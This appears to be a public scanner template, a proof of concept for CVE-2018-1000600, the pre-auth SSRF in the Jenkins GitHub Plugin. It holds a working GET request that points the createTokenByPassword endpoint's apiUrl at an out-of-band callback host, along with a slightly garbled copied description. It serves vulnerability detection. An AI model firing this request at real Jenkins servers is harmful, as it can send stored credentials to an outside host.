A exposure of sensitive information vulnerability exists in Jenkins GitHub Plugin 1.29.1 and earlier in GitHubTokenCredentialsCreator.java that allows attackers to an attacker-specified URL using attacker-specified credentials IDs obtained through another method, capturing credentials stored in Jenkins.
PoC代码[已公开]
id: CVE-2018-1000600
info:
name: Pre-auth Fully-responded SSRF
author: geeknik
severity: high
verified: false
description: A exposure of sensitive information vulnerability exists in Jenkins GitHub Plugin 1.29.1 and earlier in GitHubTokenCredentialsCreator.java that allows attackers to an attacker-specified URL using attacker-specified credentials IDs obtained through another method, capturing credentials stored in Jenkins.
reference:
- https://www.jenkins.io/security/advisory/2018-06-25/#SECURITY-915
- https://devco.re/blog/2019/01/16/hacking-Jenkins-part1-play-with-dynamic-routing/
tags: cve,cve2018,ssrf
created: 2024/02/25
set:
oob: oob()
oobHTTP: oob.HTTP
rules:
r0:
request:
method: GET
path: /securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.github.config.GitHubTokenCredentialsCreator/createTokenByPassword?apiUrl={{oobHTTP}}
expression: oobCheck(oob, oob.ProtocolHTTP, 3)
expression: r0()